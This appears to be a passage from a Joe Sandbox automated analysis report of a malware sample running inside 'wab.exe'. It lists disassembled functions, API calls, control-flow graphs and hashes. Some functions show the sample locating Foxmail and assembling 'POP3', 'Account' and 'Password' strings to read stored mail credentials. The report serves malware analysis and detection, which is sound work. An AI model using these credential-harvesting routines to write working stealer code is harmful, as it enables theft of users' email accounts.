                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                          • String ID: )$Foxmail$ProgramFiles
                                          • API String ID: 672098462-2938083778
                                          • Opcode ID: 32e58d49e287b1af7f3e6e99b55641d3ffb27736d9947c0ab93f3f4046bb7a8f
                                          • Instruction ID: cb24d072916c2e7467ed5b9c6964e131f8f632641d83146486098ee029066dcf
                                          • Opcode Fuzzy Hash: 32e58d49e287b1af7f3e6e99b55641d3ffb27736d9947c0ab93f3f4046bb7a8f
                                          • Instruction Fuzzy Hash: 6C818371A5035CAAEB20DBA4DC85FEF737DEF84710F000696F508E71A1EAB15A84CB95
                                          Function 22B259B5 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 64 22b259b5-22b259be 65 22b259d2-22b259d3 64->65 66 22b259c0-22b259cb call 22b259d6 call 22b2571e 64->66 70 22b259d0-22b259d1 66->70 70->65
                                          APIs
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B259EA
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B259F6
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A01
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A0C
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A17
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A22
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A2D
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A38
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A43
                                            • Part of subcall function 22B259D6: _free.LIBCMT ref: 22B25A51
                                          • _free.LIBCMT ref: 22B259CB
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: a10c4fce587a2011ee79e41ef0986008735e113b389719567842526d62b07321
                                          • Instruction ID: e89826da0f63e2675f237256cb68d8b3e0bce51f3c72ca369124b4d76983177d
                                          • Opcode Fuzzy Hash: a10c4fce587a2011ee79e41ef0986008735e113b389719567842526d62b07321
                                          • Instruction Fuzzy Hash: B4C01272009B08AADB19AE00D911A593F95DB503A4F60C126BA0C154709A7299A1D6C8

                                          Non-executed Functions

                                          Function 22B260E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 22B261DA
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 22B261E4
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 22B261F1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 71b0ecdb45a638d2e6d5a20179d535c21276c9641b0988143e57cd94f5b068b5
                                          • Instruction ID: 607614b319cd2a23e4ec0dc471ed754d69bf3e6ae903fc57278bb78c8e6317e9
                                          • Opcode Fuzzy Hash: 71b0ecdb45a638d2e6d5a20179d535c21276c9641b0988143e57cd94f5b068b5
                                          • Instruction Fuzzy Hash: B031A074D513289BCB21DF64D988B8DBBB8AF18310F5042EAE81CA7260E7749F858F45
                                          Function 22B24AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,22B24A8A,?,22B32238,0000000C,22B24BBD,00000000,00000000,?,22B22082,22B32108,0000000C,22B21F3A,?), ref: 22B24AD5
                                          • TerminateProcess.KERNEL32(00000000,?,22B24A8A,?,22B32238,0000000C,22B24BBD,00000000,00000000,?,22B22082,22B32108,0000000C,22B21F3A,?), ref: 22B24ADC
                                          • ExitProcess.KERNEL32 ref: 22B24AEE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: b779bedf304760bfdd1ff288de2b8dfc205a3459347b092403e897759472cc56
                                          • Instruction ID: a173c99786dd979dc2e3af956359d40dd134ab3ce378c63a74aac108114b2310
                                          • Opcode Fuzzy Hash: b779bedf304760bfdd1ff288de2b8dfc205a3459347b092403e897759472cc56
                                          • Instruction Fuzzy Hash: 65E01A35000B05AFCB01AF64CA18A4A3B29EF09381F014610FE184B435CB39D943DA84
                                          Function 22B26580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: 6868fa95c848adecd328bd500c4930a7d14707d9aa0a5a35f8b9eae0f690953d
                                          • Instruction ID: 30a8c47e318b90089f0ee844e32a72ee4c7fc30af757e698377dc89d7585db03
                                          • Opcode Fuzzy Hash: 6868fa95c848adecd328bd500c4930a7d14707d9aa0a5a35f8b9eae0f690953d
                                          • Instruction Fuzzy Hash: 61310271900709AFCB15CE78CD84EEA7BBDDB85304F0003A9E91CD7266E6319E458B60
                                          Function 22B2724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: 7921c3834c1e837f4b23a7f8a38c5fcb3759f6f5209085152f0afb334c36413b
                                          • Instruction ID: dc2b1f8673eb01052203b40d2adb2e30a58c8a3a1cf80794e7af806655117118
                                          • Opcode Fuzzy Hash: 7921c3834c1e837f4b23a7f8a38c5fcb3759f6f5209085152f0afb334c36413b
                                          • Instruction Fuzzy Hash: 41A011302802038F83008F30822A20E3AACBE802C0B020A2AAC08CA028EB2C80008A00
                                          Function 22B2173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 88 22b2173a-22b217fe call 22b2c030 call 22b22c40 * 2 95 22b21803 call 22b21cca 88->95 96 22b21808-22b2180c 95->96 97 22b21812-22b21816 96->97 98 22b219ad-22b219b1 96->98 97->98 99 22b2181c-22b21837 call 22b21ede 97->99 102 22b2199f-22b219ac call 22b21ee7 * 2 99->102 103 22b2183d-22b21845 99->103 102->98 105 22b21982-22b21985 103->105 106 22b2184b-22b2184e 103->106 108 22b21987 105->108 109 22b21995-22b21999 105->109 106->105 110 22b21854-22b21881 call 22b244b0 * 2 call 22b21db7 106->110 112 22b2198a-22b2198d call 22b22c40 108->112 109->102 109->103 122 22b21887-22b2189f call 22b244b0 call 22b21db7 110->122 123 22b2193d-22b21943 110->123 118 22b21992 112->118 118->109 122->123 139 22b218a5-22b218a8 122->139 125 22b21945-22b21947 123->125 126 22b2197e-22b21980 123->126 125->126 127 22b21949-22b2194b 125->127 126->112 129 22b21961-22b2197c call 22b216aa 127->129 130 22b2194d-22b2194f 127->130 129->118 132 22b21951-22b21953 130->132 133 22b21955-22b21957 130->133 132->129 132->133 136 22b21959-22b2195b 133->136 137 22b2195d-22b2195f 133->137 136->129 136->137 137->126 137->129 140 22b218c4-22b218dc call 22b244b0 call 22b21db7 139->140 141 22b218aa-22b218c2 call 22b244b0 call 22b21db7 139->141 140->109 150 22b218e2-22b2193b call 22b216aa call 22b215da call 22b22c40 * 2 140->150 141->140 141->150 150->109
                                          APIs
                                            • Part of subcall function 22B21CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D1B
                                            • Part of subcall function 22B21CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22B21D37
                                            • Part of subcall function 22B21CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D4B
                                          • _strlen.LIBCMT ref: 22B21855
                                          • _strlen.LIBCMT ref: 22B21869
                                          • _strlen.LIBCMT ref: 22B2188B
                                          • _strlen.LIBCMT ref: 22B218AE
                                          • _strlen.LIBCMT ref: 22B218C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _strlen$File$CopyCreateDelete
                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                          • API String ID: 3296212668-3023110444
                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                          • Instruction ID: e273ff3826e26e77cdd161ef8201e18f398c338f20d8d2ee3c8aabdd158ba9f3
                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                          • Instruction Fuzzy Hash: EA61E471D10B18ABEF11CBA4CC40BDEB7B9AF19304F104656D20CBB266DB745A46CF52
                                          Function 22B219B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: %m$~$Gon~$~F@7$~dra
                                          • API String ID: 4218353326-230879103
                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                          • Instruction ID: c8189e6362229575fd43b0d6c3fd16d2129c450994aecfd7b6407ca6787cb39f
                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                          • Instruction Fuzzy Hash: D071F3B1D10B286BDF11DBA48C84BDF7BFCAB19300F144196D658E7252EA749785CBA0
                                          Function 22B27CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 228 22b27cc2-22b27cd6 229 22b27d44-22b27d4c 228->229 230 22b27cd8-22b27cdd 228->230 231 22b27d93-22b27dab call 22b27e35 229->231 232 22b27d4e-22b27d51 229->232 230->229 233 22b27cdf-22b27ce4 230->233 241 22b27dae-22b27db5 231->241 232->231 234 22b27d53-22b27d90 call 22b2571e * 4 232->234 233->229 236 22b27ce6-22b27ce9 233->236 234->231 236->229 239 22b27ceb-22b27cf3 236->239 242 22b27cf5-22b27cf8 239->242 243 22b27d0d-22b27d15 239->243 244 22b27db7-22b27dbb 241->244 245 22b27dd4-22b27dd8 241->245 242->243 246 22b27cfa-22b27d0c call 22b2571e call 22b290ba 242->246 248 22b27d17-22b27d1a 243->248 249 22b27d2f-22b27d43 call 22b2571e * 2 243->249 250 22b27dd1 244->250 251 22b27dbd-22b27dc0 244->251 255 22b27df0-22b27dfc 245->255 256 22b27dda-22b27ddf 245->256 246->243 248->249 254 22b27d1c-22b27d2e call 22b2571e call 22b291b8 248->254 249->229 250->245 251->250 259 22b27dc2-22b27dd0 call 22b2571e * 2 251->259 254->249 255->241 258 22b27dfe-22b27e0b call 22b2571e 255->258 263 22b27de1-22b27de4 256->263 264 22b27ded 256->264 259->250 263->264 271 22b27de6-22b27dec call 22b2571e 263->271 264->255 271->264
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 22B27D06
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B290D7
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B290E9
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B290FB
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B2910D
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B2911F
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29131
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29143
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29155
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29167
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B29179
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B2918B
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B2919D
                                            • Part of subcall function 22B290BA: _free.LIBCMT ref: 22B291AF
                                          • _free.LIBCMT ref: 22B27CFB
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B27D1D
                                          • _free.LIBCMT ref: 22B27D32
                                          • _free.LIBCMT ref: 22B27D3D
                                          • _free.LIBCMT ref: 22B27D5F
                                          • _free.LIBCMT ref: 22B27D72
                                          • _free.LIBCMT ref: 22B27D80
                                          • _free.LIBCMT ref: 22B27D8B
                                          • _free.LIBCMT ref: 22B27DC3
                                          • _free.LIBCMT ref: 22B27DCA
                                          • _free.LIBCMT ref: 22B27DE7
                                          • _free.LIBCMT ref: 22B27DFF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 8dddc3e6391f428d72e0a8f3ee60a97645ee6995a5218f86163c9789223de28e
                                          • Instruction ID: 20180880b8a8586c840142851150907877d691b85cb028a17b161709e899e264
                                          • Opcode Fuzzy Hash: 8dddc3e6391f428d72e0a8f3ee60a97645ee6995a5218f86163c9789223de28e
                                          • Instruction Fuzzy Hash: F5315E71600B04EFDB25DE39DA40BA677E9EF04394F208659E84CD75B1DF71A980DB14
                                          Function 22B259D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • _free.LIBCMT ref: 22B259EA
                                            • Part of subcall function 22B2571E: RtlFreeHeap.NTDLL(00000000,00000000,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?), ref: 22B25734
                                            • Part of subcall function 22B2571E: GetLastError.KERNEL32(?,?,22B2924F,?,00000000,?,00000000,?,22B29276,?,00000007,?,?,22B27E5A,?,?), ref: 22B25746
                                          • _free.LIBCMT ref: 22B259F6
                                          • _free.LIBCMT ref: 22B25A01
                                          • _free.LIBCMT ref: 22B25A0C
                                          • _free.LIBCMT ref: 22B25A17
                                          • _free.LIBCMT ref: 22B25A22
                                          • _free.LIBCMT ref: 22B25A2D
                                          • _free.LIBCMT ref: 22B25A38
                                          • _free.LIBCMT ref: 22B25A43
                                          • _free.LIBCMT ref: 22B25A51
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 9ab104301a44f129b8b3b4b8b52c21de1ab49f17a0dcd589093740ffc2c11611
                                          • Instruction ID: 959fe1ff79d6c7ac9c6ecc4dc35821a5f416eed3252e02fb13e0bb476f86fa1d
                                          • Opcode Fuzzy Hash: 9ab104301a44f129b8b3b4b8b52c21de1ab49f17a0dcd589093740ffc2c11611
                                          • Instruction Fuzzy Hash: 3411A47A560748EFCB29DF94C851CDD3FA5EF18350B1582A1BA0C8F231DA71EA509B80
                                          Function 22B2AA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 312 22b2aa53-22b2aa6e 313 22b2aa80 312->313 314 22b2aa70-22b2aa7e RtlDecodePointer 312->314 315 22b2aa85-22b2aa8b 313->315 314->315 316 22b2abb2-22b2abb5 315->316 317 22b2aa91 315->317 320 22b2ac12 316->320 321 22b2abb7-22b2abba 316->321 318 22b2aba6 317->318 319 22b2aa97-22b2aa9a 317->319 322 22b2aba8-22b2abad 318->322 323 22b2aaa0 319->323 324 22b2ab47-22b2ab4a 319->324 325 22b2ac19 320->325 326 22b2ac06 321->326 327 22b2abbc-22b2abbf 321->327 328 22b2ac5b-22b2ac6a call 22b22ada 322->328 329 22b2aaa6-22b2aaab 323->329 330 22b2ab34-22b2ab42 323->330 334 22b2ab4c-22b2ab4f 324->334 335 22b2ab9d-22b2aba4 324->335 331 22b2ac20-22b2ac49 325->331 326->320 332 22b2abc1-22b2abc4 327->332 333 22b2abfa 327->333 338 22b2ab25-22b2ab2f 329->338 339 22b2aaad-22b2aab0 329->339 330->331 359 22b2ac56-22b2ac59 331->359 360 22b2ac4b-22b2ac50 call 22b26368 331->360 340 22b2abc6-22b2abc9 332->340 341 22b2abee 332->341 333->326 342 22b2ab51-22b2ab54 334->342 343 22b2ab94-22b2ab9b 334->343 337 22b2ab61-22b2ab8f 335->337 337->359 338->331 346 22b2aab2-22b2aab5 339->346 347 22b2ab1c-22b2ab23 339->347 349 22b2abe2 340->349 350 22b2abcb-22b2abd0 340->350 341->333 342->328 344 22b2ab5a 342->344 343->325 344->337 355 22b2aab7-22b2aaba 346->355 356 22b2ab0d-22b2ab17 346->356 354 22b2aac7-22b2aaf7 347->354 349->341 351 22b2abd2-22b2abd5 350->351 352 22b2abdb-22b2abe0 350->352 351->328 351->352 352->322 354->359 366 22b2aafd-22b2ab08 call 22b26368 354->366 355->328 357 22b2aac0 355->357 356->331 357->354 359->328 360->359 366->359
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: DecodePointer
                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                          • API String ID: 3527080286-3064271455
                                          • Opcode ID: f77b7eba20fbf40a0a5ad6d9627eda4a36262960787b682b975e457d173e06b2
                                          • Instruction ID: 334e4cd729dae163e2ba5c20b01f77401fb005725525d738462c62254e0e208d
                                          • Opcode Fuzzy Hash: f77b7eba20fbf40a0a5ad6d9627eda4a36262960787b682b975e457d173e06b2
                                          • Instruction Fuzzy Hash: 38514C70900F4ACBEB01DFA4DA885DCBBB5FF4B254F104785E998B7664CB398A64CB14
                                          Function 22B21CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D1B
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22B21D37
                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D4B
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D58
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D72
                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D7D
                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22B21D8A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 1454806937-0
                                          • Opcode ID: bfb7f6277d97c55fa906446c0355fb1830b9debe3e9faaf6716cbe98e3b9c37a
                                          • Instruction ID: d08fddc93eb366c47375ac8575456c978fe82cf92614a766b5c546a3080bf30b
                                          • Opcode Fuzzy Hash: bfb7f6277d97c55fa906446c0355fb1830b9debe3e9faaf6716cbe98e3b9c37a
                                          • Instruction Fuzzy Hash: AF212AB194131DBFEB11DBA08C8CEEB76ACEF18394F010AA6F915D3154D6749E468A70
                                          Function 22B29492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 386 22b29492-22b294ef GetConsoleCP 387 22b29632-22b29644 call 22b22ada 386->387 388 22b294f5-22b29511 386->388 389 22b29513-22b2952a 388->389 390 22b2952c-22b2953d call 22b27c19 388->390 392 22b29566-22b29575 call 22b279e6 389->392 397 22b29563-22b29565 390->397 398 22b2953f-22b29542 390->398 392->387 402 22b2957b-22b2959b WideCharToMultiByte 392->402 397->392 400 22b29548-22b2955a call 22b279e6 398->400 401 22b29609-22b29628 398->401 400->387 409 22b29560-22b29561 400->409 401->387 402->387 403 22b295a1-22b295b7 WriteFile 402->403 405 22b2962a-22b29630 GetLastError 403->405 406 22b295b9-22b295ca 403->406 405->387 406->387 408 22b295cc-22b295d0 406->408 410 22b295d2-22b295f0 WriteFile 408->410 411 22b295fe-22b29601 408->411 409->402 410->405 412 22b295f2-22b295f6 410->412 411->388 413 22b29607 411->413 412->387 414 22b295f8-22b295fb 412->414 413->387 414->411
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22B29C07,?,00000000,?,00000000,00000000), ref: 22B294D4
                                          • __fassign.LIBCMT ref: 22B2954F
                                          • __fassign.LIBCMT ref: 22B2956A
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 22B29590
                                          • WriteFile.KERNEL32(?,?,00000000,22B29C07,00000000,?,?,?,?,?,?,?,?,?,22B29C07,?), ref: 22B295AF
                                          • WriteFile.KERNEL32(?,?,?,22B29C07,00000000,?,?,?,?,?,?,?,?,?,22B29C07,?), ref: 22B295E8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: f00452924bfc56d2d026ca7a3e4d1a97e6fa6863fedf6958e9ad42ccc897aa7c
                                          • Instruction ID: a17f393415f7cd131ea0348f38e9d47ad07b647b8bdc2e710c4457a6b1ca1153
                                          • Opcode Fuzzy Hash: f00452924bfc56d2d026ca7a3e4d1a97e6fa6863fedf6958e9ad42ccc897aa7c
                                          • Instruction Fuzzy Hash: B151B571E00B89AFDB11CFA4C895ADEBBF8EF0D300F24461AE959E7291D7309941CB65
                                          Function 22B23370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 415 22b23370-22b233b5 call 22b23330 call 22b237a7 420 22b23416-22b23419 415->420 421 22b233b7-22b233c9 415->421 422 22b2341b-22b23428 call 22b23790 420->422 423 22b23439-22b23442 420->423 421->423 424 22b233cb 421->424 427 22b2342d-22b23436 call 22b23330 422->427 426 22b233d0-22b233e7 424->426 428 22b233e9-22b233f7 call 22b23740 426->428 429 22b233fd 426->429 427->423 437 22b233f9 428->437 438 22b2340d-22b23414 428->438 432 22b23400-22b23405 429->432 432->426 435 22b23407-22b23409 432->435 435->423 436 22b2340b 435->436 436->427 439 22b23443-22b2344c 437->439 440 22b233fb 437->440 438->427 441 22b23486-22b23496 call 22b23774 439->441 442 22b2344e-22b23455 439->442 440->432 447 22b234aa-22b234c6 call 22b23330 call 22b23758 441->447 448 22b23498-22b234a7 call 22b23790 441->448 442->441 444 22b23457-22b23466 call 22b2bbe0 442->444 452 22b23483 444->452 453 22b23468-22b23480 444->453 448->447 452->441 453->452
                                          APIs
